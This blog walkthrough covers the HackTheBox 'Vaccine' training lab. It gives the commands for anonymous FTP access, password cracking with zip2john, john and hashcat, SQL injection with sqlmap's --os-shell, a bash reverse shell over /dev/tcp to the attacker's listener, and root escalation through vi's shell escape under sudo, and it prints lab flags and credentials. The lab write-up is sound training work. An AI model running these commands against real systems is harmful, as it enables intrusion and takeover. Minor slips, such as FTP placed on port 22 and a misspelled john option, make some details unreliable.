HTB Labs — Tier 2 — “Vaccine” Machine Walkthrough | By: CyberAlp0

Hey Folks, this is CyberAlp0. Back again to a new walkthrough powered by HTB, Tier 2, named “Vaccine”. Vaccine is one of the VIP labs in HackTheBox — Tier 2 — Starting Point Phase. It covers many skills like SQL Injection (That is why it is called vaccine, it is some kind of injection), Password cracking, RCE, and many more. We will be delving into many challenges and tasks to reach our final flag, the root flag.
Executive Summary
Here is an executive summary of the steps we will follow:
Stage I: Scanning
The scanning phase identifies a multi-service attack surface, with the target exposing SSH, HTTP, and FTP. The presence of FTP immediately suggests a potential misconfiguration, particularly the common allowance of anonymous authentication.
Upon the Nmap scan, we will find the following information
- Service Running: ftp
- Service Version: 3.0.3
- Exposed Port: 21/tcp
Stage II: Enumeration
FTP confirms the suspicion of anonymous login, allowing direct retrieval of a password-protected backup.zip file. Using password-cracking utilities — first converting the archive to a crackable format via zip2john and then recovering the password from a dictionary wordlist — reveals sensitive credentials inside the extracted files. These credentials provide access to the web application as admin, where further testing uncovers a SQL injection vulnerability.
Stage III: Exploiting
Exploitation progresses through multiple phases. SQL injection is weaponized to obtain remote code execution, leading to a reverse shell and an initial foothold on the system as the postgres user. Enumerating local configuration files reveals valid SSH credentials for the same user, enabling a more stable connection. Privilege escalation becomes possible when identifying that postgres can run vi with sudo permissions. Using vi’s built-in shell escape capability grants full root access.
Let’s not waste more time on the introduction and begin hacking!
Step 1: Connecting to the Starting Point Labs Servers.
To attack the target machine, you have to be on the same network. You can read my blog which will guide you step-by-step into connecting to the target machine.
Step 2: Spawning the Machine and Starting to Solve the Tasks.
Before solving the tasks, we shall begin scanning and enumeration to gather as much information about the machine we are about to spawn.
We can use two different scanner tools Nmap and Rustscan. Since Nmap is my favorite, we will use it and execute the following command on the terminal and leave it in the background till the scanning phase is finished.
Write the following command to start scanning for the target, and:
- Gather information about the target’s version By using the -sV Option.
- Perform a script scanning using the default set of scripts By using the -sC option. It’s equivalent to script=default.
- Perform an aggressive scan, by using option (-A).
You can make use of explainshell website to have a better understanding of Linux command lines.

Task 1: Besides SSH and HTTP, what other service is hosted on this box?
Answer: ftp
Walkthrough:
According to the Nmap scan, we can see that there are lots of services that run on the target server, along with the ports these services operate through. According to the Nmap scan, the services that run are SSH, HTTP, and FTP.
Task 2: This service can be configured to allow login with any password for a specific username. What is that username?
Answer: anonymous
Walkthrough:
Remember HackTheBox lab named FAWN in TIER 0, Starting Point Phase? You can check my blog to wrap up all that we have discussed throughout this blog. We have thoroughly dived into the exploitation of the FTP service through port 22. We learned that a user can gain access to a system running FTP without a password just by using the username anonymous.
Read more about solving "FAWN” HackTheBox machine.
Task 3: What is the name of the file downloaded over this service?
Answer: backup.zip
Walkthrough:
As we have learned in the FAWN HackTheBox machine, we can have a successful login to a target system that has an FTP service running through the command
ftp -p anonymous@10.129.15.8
Use the ls command to navigate into the contents of the server. You can see that the only file that is uploaded to the server is the backup.zip.
You can download the zip file using the command get as shown in the screenshot below.

The zip file is protected with a password. We will cover how to crack it in the next tasks.

Also, note that, in our first initial scan using Nmap, if we had a closer look into the result of the scan, you would find that Nmap had notified us of the vulnerability that existed in the FTP service. It gave us a hint that indicates that the FTP service is subjected to exploitation through gaining access as an anonymous user.
Not only did Nmap do that for us, and logged in as an anonymous user and listed all the files that were uploaded to the server. Take a closer look at the following screenshot

Task 4: What script comes with the John The Ripper toolset and generates a hash from a password-protected zip archive in a format to allow for cracking attempts?
Answer: zip2john
Walkthrough:
Before going to the walkthrough of this task, you need to know that John the Ripper doesn’t come with scripts designed to generate hashes from password-protected zip archives.
However, John the Ripper can handle password-protected zip files with built-in support for many file formats.
There is a utility that comes with John the Ripper tool called “zip2john”. This Utility allows you to extract the necessary information from the zip file and convert it into a format John the Ripper can deal with and crack.
Type the following command to extract the useful information from the zip file in a way that JTR can handle and crack. This command will create a hash of the zip file’s password and save it in a hash.txt
sudo zip2john backup.zip > hash.txt
Following is the hash file, which JTR can deal with

Now, we will be using the RockYou Wordlist that comes preconfigured in Kali to crack the hash file and get the password. The word list can be found in the following path /usr/share/wordlists/rockyou.txt
sudo john --wordloists=/usr/share/wordlists/rockyou.txt hash.txt
The Password is 741852963.
Task 5: What is the password for the admin user on the website?
Answer: qwerty789
Walkthrough:
After extracting the zip file, You shall find a PHP page. Once you open it, you shall find the username admin and the password in a hash format as shown in the following screenshot

The password of the admin is hashed and its value is cb42f8734ea607eefed3b70af13bbd3.
If you find out that those points exist in your hash, this is most likely an MD5 hash.
1- The length: MD5 Hash is 32 characters long.
2- Character Set: MD5 are hexadecimal. if you find that hash consists of characters from {A-F} & Number sets from {0:9}, This is likely an MD5 hash.
One of the most popular tools for cracking MD5 hashes is hashcat. To use it, type the following command
sudo hashcat -m 0 hashfile.txt /usr/share/wordlists/rockyou.txt --show


The Password for the admin user is qwerty789
If you are running kali on a virtual machine and allcoated less than 3 GB for the RAM, You may encounter the following error when running the hashcat tool or any tool that is used in cracking passwords.
“ Not enough allocatable device memory for this attack.”
To solve this issue, Turn off the machine and allocate a 4GB (4096MB) to the ram and all will go through.
Task 6: What option can be passed to sqlmap to try to get command execution via the SQL injection?
Answer: — os-shell
Walkthrough:
Since we got the user’s password, which is “qwerty789”. We shall start exploiting this and gain access to the web application dashboard. Copy and paste the website URL and log in with the admin credentials.

If you want to test for a possible SQL injection vulnerability, add a single quote (‘) to the search parameter in the URL of the web application.
In this scenario, we will be searching for the word “alpha” in the search box. We will notice that the URL is as follows:
http://10.129.95.174/dashboard.php?search=alphaAdding a single quote to the search parameter (alpha), will allow us to test whether the application handles the input properly or generates an error. If the response of the server is an error or it responds with an unexpected behavior, it might be a SQL injection vulnerability.
So, let’s give it a try by adding a single quote and using the sqlmap tool to check whether there is a vulnerability or not.
The Sqlmap tool requires getting the cookie, as it is essentail to maintain the session information. To get the cookie of the session, right click on the page and click on inspect, then press on storage, then go for the “cookie” subtab, then go for the value of the “PHPSESSID”.

Open the terminal and type the following command to call the sqlmap tool to see whether the web application is vulnerable to SQL injection or not.
sudo sqlmap -u "http://10.129.95.174/dashboard.php?search=alpha'" --cookie="PHPSESSID=ronvqpn0edbeb3fvct0gue88ep" --os-shellLet’s break down the previous command line to see what each parameter does.

The following is the result of the sqlmap command towards the target IP.


Since we now have an open shell on the target server, we will try to make the shell more stable and interactive. We will be opening the Netcat to listen to any incoming requests through port 4444. Meanwhile, we will ask the target server to send a request by typing the following command.
bash -c "bash -i >& /dev/tcp/10.10.14.67/4444 0>&1"
To have a better understanding of how the reverse shell works, check the following short video https://www.youtube.com/shorts/Z5fGrYxI76E.
Let’s break the last command to understand how it works:


Now that we have a stable shell, let’s make it interactive, as we have previously explained in the previous machine titled “OOPSIE”
Check my write up for solving the “OOPSIE” Machine through this link.
To make the session interactive, type the following command in the terminal.
python3 -c 'import pty; pty.spawn("/bin/bash")'Now, you are logged in as postgres. You can check the ID using the command whoami.

Task 7: What program can the postgres user run as root using sudo?
Answer: vi
Walkthrough:
Now, after we have a login as a normal user called postgres, we will try to escalate our privileges from a normal user to a root user by trying to find any configuration files inside the server. Usually, you will find such files in the path /var/www/html. We are trying here to find PHP files in which such credentials (users and passwords) can be found.

As shown in the following screenshot, you shall find the password for the user postgres himself. So, rather than having an open shell, we will be connecting to the server directly using SSH. Type the following command to grep the password.
cat dashboard.php | grep password
As shown in the screenshot, the user is Postgres and the password is P@s5w0rd!
We will connect as postgres using SSH. Use the following command to connect via SSH:
ssh postgres@10.129.95.174
Now, we have logged in as a postgres user. By typing the whoami command, we shall see the ID of the user “postgres”. To escalate the privileges, we will be typing the command sudo -l and seeing the result when shifting from normal to the root user.

As highlighted in the previous screenshot, the user postgres is allowed to run the following command on the machine vaccine. This command allows us to edit a config file called pg_hba.conf using Vim
Vim is an editing binary executable that is used to edit files in Linux. There is another binary executable called nano. It is used for editing files as well.
Task 8: Submit the User flag
Answer: ec9b13ca4d6229cd5cc1e09980965bf7
Walkthrough:
Since we are logged in as a normal user called postgres (as we have his credentials), it is easy to get the user flag by typing ls to list all the contents of the home directory of the user postgres. Use the cat command to fetch the user flag.

The user flag is ec9b13ca4d6229cd5cc1e09980965bf7
Task 9: Submit the Root Flag
Answer: dd6e058e814260bc70e9bbdef2715849
Walkthrough:
Let’s finish what we started in escalating the privileges. We are now able to edit the config file named “pg_hba.conf” using the vi command. Type the following command in the terminal.
sudo /bin/vi /etc/postgresql/11/main/pg_hba.confLet’s break through the command to understand it more and see how it is going to be useful for us in escalating our privileges.

By executing this command with sudo, you are elevating your privileges to modify the pg_hba.conf file. This file controls client authentication rules for the PostgreSQL database server. Editing this file allows you to specify who can connect to the database server and what authentication method should be used.
By typing the following line, we will allow us to gain root privilege.
:shell
This sceanrio looks similar to what we done in the OOPSIE machine from HTB. In this mahcine, we noticed that there is a program is being called by any user, eventhough it is owned by the root. Thanks to SUID permissions, we managed to take and advatnge of a binary executable called cat. We created a file called cat in the /tmp, then modified the path variables to lure the terminal into calling out modified cat file instead of the binary executable (cat) in the /sbin. Thus, we had a root access. Read more about OOPSIE walkthrough by following this link.

If you wanted to know more information about the possible shells you may use in different binaries. Visit the following website. It will give you better understanding of the shells you may use in your exploitation stage.

Since we have root access, type ls to list all the contents under the /root directory. You shall find the root.txt. By fetching what’s inside it using the cat command, you will find the root flag.

The Root Flag is dd6e058e814260bc70e9bbdef2715849.
Hope you enjoyed reading my blog about solving Vaccine machine from HTB — Tier 2 — Starting Point Phase.
See You in another write-up!.


